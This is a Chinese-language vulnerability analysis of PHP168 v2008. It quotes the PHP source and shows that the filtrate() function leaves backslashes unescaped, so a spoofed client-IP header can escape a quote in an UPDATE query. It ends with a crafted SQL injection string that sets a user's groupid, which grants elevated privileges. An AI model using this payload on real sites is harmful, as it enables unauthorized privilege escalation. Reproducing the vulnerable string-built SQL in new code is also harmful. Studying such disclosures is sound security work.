简单分析下这个漏洞 common.inc.php if($_SERVER['HTTP_CLIENT_IP']){ $onlineip=$_SERVER['HTTP_CLIENT_IP']; }elseif($_SERVER['HTTP_X_FORWARDED_FOR']){ $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $onlineip=$_SERVER['REMOTE_ADDR']; } $onlineip = preg_replace(”/^([\d\.]+).*/”, ”\\1″, filtrate($onlineip)); //这个地方使用preg_replace存在着安全隐患,之前就暴过漏洞,官方修补的方法是用filtrate函数处理了下$onlineip看一下filtrate函数是怎么处理的 function.inc.php function filtrate($msg){ $msg = str_replace('&','&',$msg); $msg = str_replace(' ',' ',$msg); $msg = str_replace('"','"',$msg); $msg = str_replace("'",''',$msg); $msg = str_replace("<","<",$msg); $msg = str_replace(">",">",$msg); $msg = str_replace("\t"," ",$msg); $msg = str_replace("\r","",$msg); $msg = str_replace(" "," ",$msg); return $msg; } 过滤了 '"< 等,但是没有处理\ common.inc.php if($usr_oltime>30||!$usr_oltime){ $usr_oltime>600...
简单分析下这个漏洞 common.inc.php if($_SERVER['HTTP_CLIENT_IP']){ $onlineip=$_SERVER['HTTP_CLIENT_IP']; }elseif($_SERVER['HTTP_X_FORWARDED_FOR']){ $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $onlineip=$_SERVER['REMOTE_ADDR']; } $onlineip = preg_replace(”/^([\d\.]+).*/”, ”\\1″, filtrate($onlineip)); //这个地方使用preg_replace存在着安全隐患,之前就暴过漏洞,官方修补的方法是用filtrate函数处理了下$onlineip看一下filtrate函数是怎么处理的 function.inc.php function filtrate($msg){ $msg = str_replace('&','&',$msg); $msg = str_replace(' ',' ',$msg); $msg = str_replace('"','"',$msg); $msg = str_replace("'",''',$msg); $msg = str_replace("<","<",$msg); $msg = str_replace(">",">",$msg); $msg = str_replace("\t"," ",$msg); $msg = str_replace("\r","",$msg); $msg = str_replace(" "," ",$msg); return $msg; } 过滤了 '"< 等,但是没有处理\ common.inc.php if($usr_oltime>30||!$usr_oltime){ $usr_oltime>600 && $usr_oltime=600; include(PHP168_PATH."php168/level.php"); if( isset($memberlevel[$lfjdb[groupid]]) ){ $SQL=”,groupid=8″; $lfjdb[money]=get_money($lfjuid); foreach( $memberlevel AS $key=>$value){ if($lfjdb[money]>=$value){ $SQL=”,groupid=$key”; } } }else{ $SQL=”"; } $db->query(”UPDATE {$pre}memberdata SET lastvist=’$timestamp’,lastip=’$onlineip’,oltime=oltime+’$usr_oltime’$SQL WHERE uid=’$lfjuid’”); //因为这个地方是拼接字符串的形式,所以可以使用\来转义’,然后利用$usr_oltime来注射:) 另外要注意的是$usr_oltime有一个简单的判断的,而且还要保证sql语句的语法正确,看下我构造的语句: UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='[\]‘,oltime=oltime+’[+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]‘$SQL WHERE uid=’$lfjuid’ Php168 v2008 暂无 Php168
